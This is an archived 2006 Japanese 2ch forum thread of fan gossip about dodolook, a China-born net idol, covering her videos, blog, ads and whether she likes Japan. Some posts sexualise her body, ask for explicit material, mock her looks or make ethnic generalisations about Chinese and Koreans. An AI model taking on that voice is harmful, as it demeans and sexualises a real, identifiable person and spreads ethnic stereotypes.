5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

dodolook 萌え part5

1 :美麗島の名無桑:2006/12/05(火) 19:30:30

just dodolook ( ̄ε(# ̄)的影音日誌
http://www.im.tv/vlog/personal.asp?memid=228115#

前スレ
dodolook 萌え part4
http://academy4.2ch.net/test/read.cgi/taiwan/1155698243/
dodolook 萌え part3
http://academy4.2ch.net/test/read.cgi/taiwan/1150995667/
dodolook 萌え part2
http://academy4.2ch.net/test/read.cgi/taiwan/1142953932/
dodolook 萌え
http://academy4.2ch.net/test/read.cgi/taiwan/1141452745/


2 :bobolook:2006/12/05(火) 19:31:57
Blogで商売始めてみますた

3 :美麗島の名無桑:2006/12/05(火) 19:33:23
>>1




4 :美麗島の名無桑:2006/12/05(火) 19:34:28
おつんこ

5 :◆Tw6itwSiKs :2006/12/05(火) 22:55:42 ?2BP(1700)
乙〜

6 :美麗島の名無桑:2006/12/06(水) 01:06:28
糞が調子乗って商売始めましたwwwwww



ここはそんな痛い勘違い馬鹿女を観察するためのスレです

7 :美麗島の名無桑:2006/12/06(水) 01:12:52
dodoの非凡な才能に感嘆し、その可愛らしさに安らぎ、
dodoの成長を暖かく見守る、優しいお兄さん、お姉さん
おじさん達のスレです。


8 :美麗島の名無桑:2006/12/06(水) 02:05:45
>>1
乙であります!


9 :美麗島の名無桑:2006/12/06(水) 02:16:16
ここは人生=PCだけの根暗で社交性のないニートとヒッキーのためのスレです

10 :美麗島の名無桑:2006/12/06(水) 06:14:25
>>9
dodoのこと言ってるのか?

11 :美麗島の名無桑:2006/12/06(水) 12:03:40
自己紹介だろ

12 :美麗島の名無桑:2006/12/06(水) 19:56:39
dodolookをドードーしてええええええ!!!!!

13 :美麗島の名無桑:2006/12/06(水) 23:28:35
山本竜二との絡みが見たい

14 :美麗島の名無桑:2006/12/07(木) 11:26:17
【韓国芸能】冬のトレンドは「男のポニーテール」[12/07]
http://news18.2ch.net/test/read.cgi/news4plus/1165454800/

15 :美麗島の名無桑:2006/12/07(木) 15:48:57
Nishikido Ryo already knows about dodolook.

16 :美麗島の名無桑:2006/12/08(金) 00:16:21
dodoって一人っ子?

17 :美麗島の名無桑:2006/12/08(金) 10:55:24
どどは兄弟がいないみたいです。

18 :美麗島の名無桑:2006/12/08(金) 11:10:00
一人っ子はわがままなヤツが多いので嫌いです><

19 :美麗島の名無桑:2006/12/08(金) 13:42:14
妹いなかったっけ?

20 :美麗島の名無桑:2006/12/08(金) 14:09:50
ドドはnintendo DSが欲しいだってよ。前のクリスマスから考えてたけど
高いから手が出なかったらしい。


21 :美麗島の名無桑:2006/12/08(金) 16:49:03
>>20
どこに書いてある?
DS買うぐらい貰ってるだろうに

22 :美麗島の名無桑:2006/12/08(金) 16:52:08
パクリで稼いだ賞金はもう無いんだろう、

クリスマスカードで稼ぐから問題無いね!

23 :美麗島の名無桑:2006/12/08(金) 17:24:03
クリスマスカードって内職かよwwwwwww














でも欲しい

24 :美麗島の名無桑:2006/12/08(金) 20:41:53
つかvlog見れなくね?


25 :美麗島の名無桑:2006/12/08(金) 23:57:23
>>19
一人っ子政策に引っかかってないのか?
カナダにいるから大丈夫なのか

26 :美麗島の名無桑:2006/12/09(土) 02:52:07
>>24
見れないね

27 :美麗島の名無桑:2006/12/09(土) 05:22:17
クリスマスカードは事務所がらみじゃないんだね。
数量も一枚ずつみたいだし。早い者勝ちだから、今から俺が入札してくるよ。
我要買dodo的X'mas card給一万円で。


28 :美麗島の名無桑s:2006/12/09(土) 09:56:21




         事 務 所 必 死 だ な !





29 :美麗島の名無桑:2006/12/09(土) 11:50:50
ん。 誰も入札無いのか…?
ってこれ落札したらdodoと直接取引きになるのかなw

30 :美麗島の名無桑:2006/12/09(土) 16:58:46
dodoのアフロ軍曹の踊り超可愛い。
X'mas card欲しいけど、日本からでも買えるの?yahoo台湾の登録しかたが分からん
中語無能orz

31 :美麗島の名無桑:2006/12/09(土) 19:04:51
>>30
我也不会中文 (我、中文に会わざるなり)

32 :美麗島の名無桑:2006/12/09(土) 22:58:47
人生=PCだけの根暗で社交性のないニートヒッキーだらけでキモ

33 :美麗島の名無桑:2006/12/09(土) 23:26:58
               ∩_
              〈〈〈 ヽ
      ____   〈⊃  }
     /⌒  ⌒\   |   |
   /( ●)  (●)\  !   !
  / :::::⌒(__人__)⌒:::::\|   l
  |     |r┬-|       |  / <こいつ最高にアホ
  \     ` ー'´     //
  / __        /
  (___)      /




34 :美麗島の名無桑:2006/12/09(土) 23:30:43
人生=PCだけの根暗で社交性のないニートヒッキーの即レスきもすぎる(^^;

35 :美麗島の名無桑:2006/12/10(日) 00:00:44
               ∩_
              〈〈〈 ヽ
      ____   〈⊃  }
     /⌒  ⌒\   |   |
   /( ●)  (●)\  !   !
  / :::::⌒(__人__)⌒:::::\|   l
  |     |r┬-|       |  / <こいつ最高にアホ
  \     ` ー'´     //
  / __        /
  (___)      /



36 :美麗島の名無桑:2006/12/10(日) 00:27:27
               ∩_
              〈〈〈 ヽ
      ____   〈⊃  }
     /⌒  ⌒\   |   |
   /( ●)  (●)\  !   !
  / :::::⌒(__人__)⌒:::::\|   l
  |     |r┬-|       |  / <こいつ最高の人生=PCだけの根暗で社交性のないニートヒッキー
  \     ` ー'´     //
  / __        /
  (___)      /

37 :美麗島の名無桑:2006/12/10(日) 00:53:53
               ∩_
              〈〈〈 ヽ
      ____   〈⊃  }
     /⌒  ⌒\   |   |
   /( ●)  (●)\  !   !
  / :::::⌒(__人__)⌒:::::\|   l
  |     |r┬-|       |  / <こいつ最高の人生=PCだけの根暗で社交性のないニートヒッキー
  \     ` ー'´     //
  / __        /
  (___)      /


38 :美麗島の名無桑:2006/12/10(日) 01:00:20
               ∩_
              〈〈〈 ヽ
      ____   〈⊃  }
     /⌒  ⌒\   |   |
   /( ●)  (●)\  !   !
  / :::::⌒(__人__)⌒:::::\|   l
  |     |r┬-|       |  / <こいつ最高の人生=PCだけの根暗で社交性のない土曜の夜もすることない暇人ニートヒッキー
  \     ` ー'´     //
  / __        /
  (___)      /

39 :美麗島の名無桑:2006/12/10(日) 02:31:05
こいつ必死すぎwww

40 :美麗島の名無桑:2006/12/10(日) 02:40:57
               ∩_
              〈〈〈 ヽ
      ____   〈⊃  }
     /⌒  ⌒\   |   |
   /( ●)  (●)\  !   !
  / :::::⌒(__人__)⌒:::::\|   l
  |     |r┬-|       |  / <こいつ最高の人生=PCだけの根暗で社交性のない土曜深夜もすることない暇人ニートヒッキー
  \     ` ー'´     //
  / __        /
  (___)      /

41 :美麗島の名無桑:2006/12/10(日) 17:43:46
かわいいね

42 :美麗島の名無桑:2006/12/10(日) 19:20:56
アフロ軍曹ダンスうけるww
コマネチしてるよー

43 :美麗島の名無桑:2006/12/10(日) 20:45:41
dodolook可愛い×3
とりあえず「好きやねん大阪」歌ってくるよ。あの曲はジャニーズ好きの娘
には結構受けいいよね。そこそこ盛り上がってくれるし。

44 :美麗島の名無桑:2006/12/10(日) 22:59:32
>>43
あの寒いセリフまで完璧こなせるならいいけど
微妙に照れ入るようならやめておけ

45 :美麗島の名無桑:2006/12/10(日) 23:56:38
韓国人だけど、この女、正直アジアの殆どの人間から相手にされない
容姿なのは確か。しかも才能がない。
人の曲を無断使用して馬鹿騒ぎするだけの無能女。

46 :美麗島の名無桑:2006/12/11(月) 00:00:39
youtubeで知ったけども、こいつ個人情報曝してんのな。
そこまでして、芸能界に参入したいのかな?
心底汚れてる人間に違いない。

47 :美麗島の名無桑:2006/12/11(月) 00:03:25
6さん、貴方の意見に賛同します。
同じ意見の人がいてほっとしました。

48 :美麗島の名無桑:2006/12/11(月) 01:34:01
そうなんだぁ

49 :美麗島の名無桑:2006/12/11(月) 09:59:22
どどちゃんがいままで一番楽しかった旅行は日本に行った事だって。


50 :美麗島の名無桑:2006/12/11(月) 10:01:14
動ナビから飛んできた可愛いな

51 :美麗島の名無桑:2006/12/11(月) 10:06:53
アフロどこ?

52 :美麗島の名無桑:2006/12/11(月) 10:07:15
>>1を踏んでもホームに跳ばされる・・・


53 :美麗島の名無桑:2006/12/11(月) 10:38:35
>>51
URL貼って良いか分からんから
dodolookファンサイトでググってみて。


54 :美麗島の名無桑:2006/12/11(月) 13:51:40
俺は目と鼻のあたりが錦戸亮に似てるって言われるんだよ。髪形合わして大阪弁
喋れば完璧だ。vlogにアカウント作って亮のモノマネ動画アップしようかな?
そしたらdodolookも見てくれるだろう。

55 :美麗島の名無桑:2006/12/11(月) 14:05:25
是非やってみてくれ。
そして、上手い事日本に誘って。

56 :美麗島の名無桑:2006/12/11(月) 19:39:39
網上熱爆~Yumiko失手??露T-Back

ttp://www.im.tv/VLOG/Personal/393533/891629


57 :美麗島の名無桑:2006/12/11(月) 23:19:06
>>54
錦戸のライトファンですがうpしたらここで晒してくださいまし


58 :美麗島の名無桑:2006/12/12(火) 00:39:03
俺はLのファン

59 :美麗島の名無桑:2006/12/12(火) 02:30:22
dodoって顔は大きめだけど意外と体の線は細いな

60 :美麗島の名無桑:2006/12/12(火) 13:17:26
俺は大阪の難波で錦戸亮に逢ったことあるよ。普通に歩いてたら錦戸亮が前から
自転車で走ってきたよ。お互い同じ方向に避けようとして何回もフェイントの掛け合い
みたいなのをしたら、笑顔で謝ってくれたよ。感じの良い兄ちゃんだったね。
今度見かけたらdodolook知ってますかって聞こう。

61 :美麗島の名無桑:2006/12/12(火) 16:43:17
アフロ軍曹可愛い。

62 :美麗島の名無桑:2006/12/12(火) 22:07:32
    (⌒⌒)
モチツケヨ l|l l|l  dodo童貞の何がいけないんだっ!
  ∧∧∧_∧
  (;゜Д(`・ω・´)") }}}
  ヽ 、と'^)  l^)´
  〜〉  ) )、 \
   (_ノ(__) ヽ_)))




63 :美麗島の名無桑:2006/12/13(水) 10:12:36
アフロダンスで初めてdodoにエロスを感じた。

64 :美麗島の名無桑:2006/12/13(水) 11:05:01
dodolook kawaii desu.

65 :美麗島の名無桑:2006/12/13(水) 12:46:42
どどるくはドラクエもやるんだってね。俺もDS欲しくなってきた。

66 :美麗島の名無桑:2006/12/13(水) 14:48:21
だからどこに書いてるの!?
てかdodoはDS買ったのか?

67 :◆Tw6itwSiKs :2006/12/13(水) 15:26:36 ?2BP(1700)
dodoにDS買ってあげたい

68 :美麗島の名無桑:2006/12/13(水) 15:34:54
pinkのDSライトが欲しいんだよね?そしたら亮ちゃんとお揃いみたいだし。

69 :美麗島の名無桑:2006/12/13(水) 15:55:00
ryo ha siro desyo-!

70 :美麗島の名無桑:2006/12/13(水) 16:42:35
顔でかすぎw
もてる華僑系ではない。間違いない。
華僑系は本来スタイルが良い。

71 :美麗島の名無桑:2006/12/13(水) 17:09:53
>>69
亮ちゃんはpinkですよ!さっきTVに出演してた、かっこよかったです。


72 :美麗島の名無桑:2006/12/13(水) 17:20:16
dodolookが明らかに自演しているな。

73 :美麗島の名無桑:2006/12/13(水) 17:28:03
dodoちゃん居るんなら巨乳うpして下さい

74 :美麗島の名無桑:2006/12/13(水) 17:37:17
居るわけねーだろw 時差的にあり得ない、ていうか71の感嘆符は日本のOSでしか
type出来ない。このスレには女のfanもいたのか。

75 :美麗島の名無桑:2006/12/13(水) 19:01:44
>>72

ヒント>>28

76 :美麗島の名無桑:2006/12/13(水) 21:59:40
錦戸ピンク使ってるって男で???彼女の?

77 :美麗島の名無桑:2006/12/13(水) 22:01:23
>>71
dodoのBlogの写真見たら白に見えたけど、良く見るとpinkかもー
亮ちゃんがpinkとは!

78 :美麗島の名無桑:2006/12/13(水) 22:24:12
DSのことどこに書いてあるのかわからない・・・

79 :美麗島の名無桑:2006/12/14(木) 00:30:04
Yahoo!のBlogですよー!*。+゚☆ヾ(*´∀`*)ノ☆゚+。*゚


80 :美麗島の名無桑:2006/12/14(木) 00:33:55
>>79
URLプリーズ

81 :美麗島の名無桑:2006/12/14(木) 02:52:39
>>60
うらやましいです。難波のどの辺りで会ったのか教えてくれませんか?

82 :美麗島の名無桑:2006/12/14(木) 07:07:08
>>80 >>53

83 :美麗島の名無桑:2006/12/14(木) 13:56:52
ドドルックは「嫌われ者の松子の一生」が好きなんだね。
なかなか良い映画だと思うよ。

84 :美麗島の名無桑:2006/12/14(木) 20:03:26
クリスマスカードって直接メール送れば買えるんかな。
しかし、日本の銀行から振込めるんか!?

85 :美麗島の名無桑:2006/12/14(木) 20:09:35
>「嫌われ者の松子の一生」

ずいぶん野暮ったいタイトルだなw

86 :美麗島の名無桑:2006/12/14(木) 20:20:53
>>84
買うのか?www

87 :美麗島の名無桑:2006/12/14(木) 23:47:51
錦戸はDSで何のゲームやってるのかしらんが
やっぱドドは錦戸と同じゲームをやりたいんだろうな

88 :美麗島の名無桑:2006/12/15(金) 02:55:16
脳トレだよ、50代の脳だってさ

89 :美麗島の名無桑:2006/12/15(金) 14:37:44
I like dodolook

90 :美麗島の名無桑:2006/12/15(金) 15:06:34
thank you :)

91 :美麗島の名無桑:2006/12/15(金) 16:14:58
dodolo2kちゃん、どうしたんだい?
可愛いのに、こんなCM写真をとっちゃダメだよ。可愛くなくなってるよ。
http://comm.ccidnet.com/col/attachment/2006/12/951191.jpg

dodoたんは、大陸で新発売の携帯 i807のCM写真を撮ってるよ。
最新の音楽携帯のCMにネット・アイドルのdodoたんも選ばれてる。
http://tech.tom.com/2006-12-12/03C3/11576434.html

携帯は lenovoで、ピンクはなかなかいいね。発売記念で期間限定の
ネット・アイドル・ページがあって、dodoたんも参加してる。
http://www.fanspk.com.cn/

92 :美麗島の名無桑:2006/12/15(金) 16:23:27
萌えー

93 :美麗島の名無桑:2006/12/15(金) 16:48:06
今日はじめて見たけど、俺的には
純粋にした木村カエラって感じかなー。

中国出身カナダ在住日本好きネットアイドルという属性
(ネットアイドル故にある程度オタ文化に理解があるだろうという希望的観測も含めて)
が我々をとりこにするんじゃなかろうか。

・・・あとで事務所ぐるみの仕込みだったとかで
ガックリくるぱたーんじゃないよな!?

94 :美麗島の名無桑:2006/12/15(金) 17:03:00
ドド居るんだろ?www

95 :sage:2006/12/15(金) 17:18:59
実際かわいくても、自分で可愛いと思って自己PVとったり、
写真とか個人情報さらしまくるやつって、なんか引くよな・・・。

ホントは恥ずかしいんだけど、お兄ちゃんが勝手に応募しちゃったの!
的な方が俺的にグッとくるのだが・・・。

96 :美麗島の名無桑:2006/12/15(金) 18:52:06
垂れ目でガチャピン系なのが珍しいよな。

97 :美麗島の名無桑:2006/12/15(金) 22:43:38
ジャニタレ錦戸のファンというだけで興醒め

98 :美麗島の名無桑:2006/12/16(土) 00:48:53
亮ちゃん! 最強!

99 :美麗島の名無桑:2006/12/16(土) 01:15:51
>>93
そのガックリっていうのは台湾での話?
日本のファンがガックリしたとしても
もともと日本はターゲットにしてるわけじゃないし問題ない希ガス

>>95
海外だと写真とか個人情報晒すのはよくあることらしいね
日本はそういうのは危険だからやらないけど

100 :美麗島の名無桑:2006/12/16(土) 01:16:34
>>96
ガンバ大阪のヤットとかもその系じゃね?

101 :美麗島の名無桑:2006/12/16(土) 08:48:50
>>99
日本と海外の違いが分からないのだけど
日本はストーカー率が高いって事なのかな?

102 :美麗島の名無桑:2006/12/16(土) 14:11:35
>>101
また自虐か

海外ではなくアメリカなど一部

まあ欲に負けた肉体労働者が多いとも言える

103 :美麗島の名無桑:2006/12/16(土) 18:01:14
鬼かこいい

104 :美麗島の名無桑:2006/12/17(日) 00:40:25
dodoの做愛動画まだか?

105 :美麗島の名無桑:2006/12/17(日) 08:12:07
何で芸能関係の板ではないのだろう
どうでもいいけど
もうとっくに覚めてるし

106 :美麗島の名無桑:2006/12/17(日) 13:56:22
普通の中国人だったのが今年の1月からネットに自分の動画を投稿しだしただけで、
もう世界的なアイドルになったのか。
運が強すぎてすごいっていうか、ある意味尊敬する。

107 :美麗島の名無桑:2006/12/17(日) 14:06:59
なってないw

108 :美麗島の名無桑:2006/12/17(日) 18:24:51
LeahDizonは、日本デビューに 2年かかったんだから、dodoたんも
あと 1年もすれば、日本デビューかも?
俺なら、LeahDizonより、dodoたんを選ぶよ。 隠れdodoたんファンは
多いと思うよ。

109 :美麗島の名無桑:2006/12/17(日) 19:24:35
きもっ

110 :美麗島の名無桑:2006/12/17(日) 22:49:30
完全なる落ち目アクセス急減をシラン妄想乙

111 :美麗島の名無桑:2006/12/18(月) 00:37:43
dodo終わった?

112 :美麗島の名無桑:2006/12/18(月) 08:09:07
kawaii dodolook

113 :美麗島の名無桑:2006/12/18(月) 13:35:43
( ̄ε( ̄|||)

114 :美麗島の名無桑:2006/12/18(月) 22:53:05
チウ( *^ 3( ̄ε( ̄|||)


dodoとキスしてやったぜwwwwww

115 :美麗島の名無桑:2006/12/19(火) 00:10:04
唇は亮ちゃんのもの!!

116 :美麗島の名無桑:2006/12/19(火) 00:18:25
残念だったな・・・錦戸は今俺の隣で寝てるよ

117 :美麗島の名無桑:2006/12/19(火) 01:07:56
きしょいヤツばっかで引く

118 :美麗島の名無桑:2006/12/19(火) 01:18:26
                           ∧ ∧
◎               へ         ( ̄ε( ̄|||)
  \    ≫ ̄ ̄ ̄ ̄彡ヽ ̄ ̄ ̄ ̄ ̄ ̄⌒    \
      彡____人  )  ̄ ̄ ̄ ̄ ̄\       )
 ◎-●一( * *    ヽミ          |.      |
      ((_ _ (( ( ;;-=- ̄=─ ̄ '⌒ヽ〉     | |
 ‘,'.∴・,‘・(ε ((  ヽ-=_二__ ̄    \     | |
  ,'.・∵  ヽ_____ ノ       ̄\     / /
       (__))     ヽ        .\__/_丿
       |  |   >>1   ヽ         .|  |
       |  |______)          |  |
       |  〉三三三[□]三)        |  |
       ノノノノ:::::::::::::::::::::::::::::/         \ ヽ
       ~~~|::::::::::::::::::/:::::::/             \ |
         |;;;;;;;;;;;;;;;/;;;;;;;/            / ノ
        (___|)_|)           `-

119 :美麗島の名無桑:2006/12/19(火) 04:16:41
dodoは下妻と松子が好きと言うことは中島哲也監督の作品が好きなんだね。
リリィシュシュも好きという事は岩井俊二監督のも見るのかい。とてもセンス
の映画の選択だね。

120 :美麗島の名無桑:2006/12/19(火) 08:52:08
あの手のノリが好きなら「トリック」とかも好きそう。

121 :美麗島の名無桑:2006/12/19(火) 11:11:05
錦戸って急激に巨大化したからな。
なんか怪しい。

122 :美麗島の名無桑:2006/12/19(火) 11:12:50
おいらも巨大化してみたいんだがどうしたらええの?

123 :美麗島の名無桑:2006/12/19(火) 11:36:33
     ヽ(^o^ )     ♪ とってもいーじゃん ♪
     (( /ヽ ゝ
        <
        ┛ 
      ( ^o^)ノ    ♪ きりすてコギャル ♪
    (( レヽ_ゝ ))
        )(
       ┗ ┛
       (^o^ )     ♪ マゴギャルかついじゃって ♪
      ̄丿─ア ミ
       > >
       ┗┗


124 :美麗島の名無桑:2006/12/19(火) 14:28:55
僕は錦戸亮の大阪の家の近くに住んでるけど、ファンの娘とかがたまに周辺を
ウロウロしててびっくりだよ。いくらファンでもそれは駄目だよ。
でもdodolookに聞かれたらすぐ案内してあげたい。

125 :美麗島の名無桑:2006/12/19(火) 17:24:32
      ___
      /     \
     /   ★    ヽ
   // ̄ ̄ ̄ ̄ ̄ヽ\
  /  | ( ● ) ( ● ) | ヽ
  |  (   _, -、_    )  ヽ
  |  ヽ( ̄ε( ̄|||) '   )
  (___/\_____/\ /
     //    ヽ\  U
  ⊂ニ /|  ∧  |ヽ ニ⊃
      | ヽ< >/ |
      \ヽ W/ /
       ヽ ニ /
      // \\
     / /    ヽヽ
    ⊂_)    (_つ

126 :美麗島の名無桑:2006/12/19(火) 21:13:21
Nishikido Ryo -- History
http://www.youtube.com/watch?v=Lo7Qzl_CEtE

まぁこれを見てくれ

127 :美麗島の名無桑:2006/12/19(火) 21:32:24
dodoに 錦戸亮と 沢尻エリカの関係を 教えてあげたら、dodoは
ショックをうけるのかな。
ryo chan wa erika to love desu

128 :美麗島の名無桑:2006/12/19(火) 22:07:48
大沢あかねから胸取ったのがdodoだろ?

129 :美麗島の名無桑:2006/12/20(水) 04:38:01
関ジャニ∞快挙!関ジャニ∞の5thシングル「関風ファイティング」。
今週、初登場で首位を獲得し、2004年8月のデビューシングル「浪花いろは節」以来、
2年3ヶ月ぶり、2作目の首位を獲得。 また、発売一週目の売上枚数は26.4万枚を記録。
【シングルチャート】
. 1位は、関ジャニ∞の「関風ファイティング」 (初登場赤丸付、26.4万枚)。
. 4位は、WaTの「ボクラノ Love Story」 (初登場赤丸付、5.5万枚)。
 
・ 7位は、NANA starring MIKA NAKASHIMAの「一色」(赤丸付、累積6.3万枚)。

亮ちゃんは頑張ってるよ。



130 :美麗島の名無桑:2006/12/20(水) 07:57:54
>>127
週刊紙の謊言ですよ。
>>129
女の子?ジャニ板でやってね(σ・∀・)σ


131 :美麗島の名無桑:2006/12/20(水) 11:00:36

        ∧∧
       ( ̄ε( ̄|||)
       __〃`ヽ 〈_
   γ´⌒´-−ヾvーヽ⌒ヽ
  /⌒  ィ    `i´  ); `ヽ
  /    ノ^ 、___¥__人  |
  !  ,,,ノ爻\_ _人 ノr;^ >  )
 (   <_ \ヘ、,, __,+、__rノ/  /
  ヽ_  \ )ゝ、__,+、_ア〃 /
    ヽ、___ ヽ.=┬─┬〈  ソ、
      〈J .〉、|   |, |ヽ-´
      /""  |   |: |
      レ   :|:   | リ
      /   ノ|__| |
      | ,,  ソ  ヽ  )
     .,ゝ   )  イ ヽ ノ
     y `レl   〈´  リ
     /   ノ   |   |
     l  /    l;;  |
     〉 〈      〉  |
    /  ::|    (_ヽ \、
   (。mnノ      `ヽnm

132 :美麗島の名無桑:2006/12/20(水) 12:12:33
そうかドドルクはスワロウテイルも好きなんだ。俺もあれは感動したぜ。
俺はLily-Chou-Chou の方が好きだったけどね。情景描写が美しいしやっぱ
岩井俊二は很好だ。ドドルクも良い趣味してるよ。

133 :美麗島の名無桑:2006/12/20(水) 13:13:05
dodolookも殺し屋1とか見たのかなぁ?

134 :美麗島の名無桑:2006/12/20(水) 15:31:09
三池崇史の殺し屋1は本人の嗜好と違いすぎるような気が。
それにしても日本通だよねどどちゃんは、どこでコマネチとかコンコン覚えたんだろう。

135 :美麗島の名無桑:2006/12/20(水) 16:18:17
dodo始まったな

136 :美麗島の名無桑:2006/12/20(水) 16:21:32
終わりの始まり

137 :美麗島の名無桑:2006/12/20(水) 18:00:20
dodoはコマネチを知ってるという事はビートたけしの番組も見てるのかな。


138 :美麗島の名無桑:2006/12/20(水) 18:18:59
コマネチなんてどこに書いてるの?

139 :dodolook:2006/12/20(水) 21:06:50
kameda yaochou de katte ne

140 :美麗島の名無桑:2006/12/20(水) 22:17:42
dodoは中二病

141 :美麗島の名無桑:2006/12/20(水) 23:06:37
↑中二病と書きたかった中二病患者

142 :美麗島の名無桑:2006/12/21(木) 01:01:30
dodolo2kちゃんは、また北京なのかな?
12月18日の北京国際文化創意産業博覧会にネットアイドルが集まって、
インターネットによる新しい創造の宣言を行ったらしいけど、まだ、写真が
見つからないんだけど、見つけたら教えて。

143 :美麗島の名無桑:2006/12/21(木) 01:30:12
>>142
ビデオで参加して、北京には行ってないみたい。
http://www.enet.com.cn/article/2006/1219/A20061219347955_2.shtml

144 :美麗島の名無桑:2006/12/21(木) 13:32:26
おお、ありがとう。日本からだと情報が無さすぎるからdodoの最新の消息が
わからないよね。

145 :美麗島の名無桑:2006/12/21(木) 14:53:50
dodolookのファンクラブに入るには日本製品を買わない事が条件て聞いたけど
ホントなの?

146 :美麗島の名無桑:2006/12/21(木) 15:01:07
そらそうよ

147 :美麗島の名無桑:2006/12/21(木) 15:06:24
♪ ∧_∧
 ( ̄ε( ̄|||) ))
(( ( つ ヽ  ♪
  〉とノ )))
  (_ノ^(_)

148 :美麗島の名無桑:2006/12/21(木) 16:18:17
中国人がアジアを魅了するとこのスレが教えてくれている

149 :美麗島の名無桑:2006/12/21(木) 16:59:13
どういう意味ですか?どこのスレ?

150 :美麗島の名無桑:2006/12/21(木) 18:01:25
大陸のサイトにはドドは反日家だって書いてあったよ。

151 :美麗島の名無桑:2006/12/21(木) 19:32:20
あれで反日だって言うんならそれでもいいよ。

152 :美麗島の名無桑:2006/12/21(木) 19:39:33
可愛いよdodolook!
我在熊本萌死了


153 :美麗島の名無桑:2006/12/21(木) 20:26:49
>>145
大陸のファンサイトの場合には、「日本製品を買わない」 とまでは
いかないで、「できるだけ、日本製品を買わない」 だよ。 あと、
廻りの人にも言わないとダメだよ。
その他に、中国は 一つ (台湾を認めない)だとか、共産党を批判
しないとかいろいろあるよ。

154 :美麗島の名無桑:2006/12/21(木) 21:06:54
北京国際文化創意産業博覧会の一環で、dodolo2kちゃんも参加してる
創作コンテストで、dodoたんの大ファンである上明会が自作ビデオを
いっぱい公開してるよ。 dodoたんに関する作品がたくさんあるよ。
ほとんどは、旧作だけど、まだ見たことないのもある。 上明会って、
すごいよ。 リアルdodoファンだね。 
http://fms.yijian.com:8080/view?pid=32264
http://60.28.160.178:8080/view?pid=33007
http://60.28.160.178:8080/view?pid=32963
http://60.28.160.178:8080/view?pid=32901
http://60.28.160.178:8080/view?pid=33049
http://fms.yijian.com:8080/view?pid=32227
http://60.28.160.178:8080/view?pid=33024

155 :美麗島の名無桑:2006/12/21(木) 21:57:24
>>154
>>dodoたんの大ファンである上明会
一瞬dodoタソが上明会のファンなのかとおもた(´・ω・`)



156 :美麗島の名無桑:2006/12/21(木) 22:14:50
dodoたんの胸は、Aカップ認定だって。 
右下の写真は初めてみた。プライベートを撮られてるみたい。
http://mxyoo.com/upimg/allimg/20060827/0726220.jpg

Aカップなんて、可愛そうだよね。Bカップまではいかないだろうけど、
どちらかというと Bじゃないかな。 でも、俺は、そんなdodoが好き。
http://www.dc175.com/pic/UploadFiles/200608/20060808093151402.jpg

157 :美麗島の名無桑:2006/12/21(木) 23:02:46
重いです。。

158 :美麗島の名無桑:2006/12/22(金) 01:12:39
俺が揉んで大きくしてやるよ

159 :美麗島の名無桑:2006/12/22(金) 07:53:11
どどるっくちゃんがハロウィン辺りの時ブログで公開した詩は
salyuのを抜粋したものだよ。I wanna beって言ってるやつ。モトネタはこれ 
http://www.youtube.com/watch?v=wPwFYv8P-84
どどるっくちゃんの携帯はモトローラので、お気にといってました。
カメラはsonyのp8から別のに買い換えたんだって。

160 :美麗島の名無桑:2006/12/22(金) 10:27:44
日中国交正常化するためにケ小平が国内向けに日本国と日本国民を
わけたことにはじまるので中国で反日とは日本国に向けてのもので
日本の市民&アニメ&漫画等一般的に中国人は特に意識しないのである
戦前日本が悪いことをしたという意識をもってればdodoや中国とも
仲良くできるから安心だよ。

161 :美麗島の名無桑:2006/12/22(金) 11:05:46
dodoは哈日族なんだね。dodoと仲良くしたい。

162 :美麗島の名無桑:2006/12/22(金) 11:14:01
dodoは反日

163 :美麗島の名無桑:2006/12/22(金) 11:46:32
dodoは山田邦子似&顔がとてもでかい

164 :美麗島の名無桑:2006/12/22(金) 13:03:08
dodolookは台湾で芸能活動をしていったほうが錦戸亮と逢える可能性が有る
のじゃないか。既にnewsは台湾でconとかやってたみたいだし。
俺はdodolookを応援するぜ。頑張れよ。

165 :美麗島の名無桑:2006/12/22(金) 13:40:35
>164
台湾から呼ぶのは無理じゃ?
コンサートとかってジャニが営業に台湾まで行くんであって
向こうから呼んでるわけではなさそう。
第一、台湾が日本のタレント呼ぶ金があるかどうかさえ不明w
コンサートに客として参加するだけなら出来そうだが

166 :美麗島の名無桑:2006/12/22(金) 13:42:54
dodoが日本に

167 :美麗島の名無桑:2006/12/22(金) 14:34:17
JASRACが歓迎会開いてくれるってよ

168 :美麗島の名無桑:2006/12/22(金) 19:39:34
mopが2006年のネットワーク人気美女の投票をやってるから、
dodoたんに入れてあげてね。 今のところdodoたんが一番だけど。

http://show.mop.com/specail/061125/index.html#5

169 :美麗島の名無桑:2006/12/22(金) 22:13:13
誰か二月丫头って人に入れてあげろよw

170 :美麗島の名無桑:2006/12/22(金) 22:23:04

来い!きええええブイーーーン  Come here



http://sports2.2ch.net/test/read.cgi/entrance2/1165533515/502



171 :美麗島の名無桑:2006/12/22(金) 23:01:49
中国人の8割「日本は謝罪が足りない」
ttp://www3.nhk.or.jp/news/2006/12/22/d20061222000062.html

172 :美麗島の名無桑:2006/12/23(土) 10:36:37
亮ちゃんはゲームがうまいらしいな。一度俺とDSで勝負してみたい。

173 :美麗島の名無桑:2006/12/23(土) 12:16:45
dodolookと錦戸亮は垂れ目だからなんとなく似てるね。

174 :美麗島の名無桑:2006/12/23(土) 16:15:17
新作キタ━━(゜∀゜)━━!!
また日本の曲だw
もうdodo親日決定だね(^−^
keikoって書いてあるけど小室が歌ってた気がするな

175 :美麗島の名無桑:2006/12/23(土) 17:14:28
普通に考えても親日でしょ。心なしかドドは日本ネタを扱う時はよく台湾の方のサイトを
使うような気がするんだけど。更新回数も台湾の方が圧倒的に多いし


176 :美麗島の名無桑:2006/12/23(土) 18:26:50
好きなアイドルは日本人。好きな漫画、アニメ、音楽、ドラマ、映画は日本の物。
今までに一番楽しかった旅行は日本。とりあえず日本には好感があるだろう。

177 :美麗島の名無桑:2006/12/24(日) 03:45:53
昔日本に住んでたみたいだし

178 :美麗島の名無桑:2006/12/24(日) 08:25:36
そろそろ親日否定厨が一言


179 :美麗島の名無桑:2006/12/24(日) 09:09:18
「朝銀って何?公的資金って何?」
ttp://chogin.parfait.ne.jp/index.html

180 :美麗島の名無桑:2006/12/24(日) 10:28:20
>>174-176

>>160

181 :美麗島の名無桑:2006/12/24(日) 12:00:20
dodoは親日です。

182 :美麗島の名無桑:2006/12/24(日) 13:14:07
やはり親日だね、強烈にアピールしてるしね
ttp://001.gamushara.net/giron/data/japjapjap.jpg

183 :美麗島の名無桑:2006/12/24(日) 13:18:22
>>182
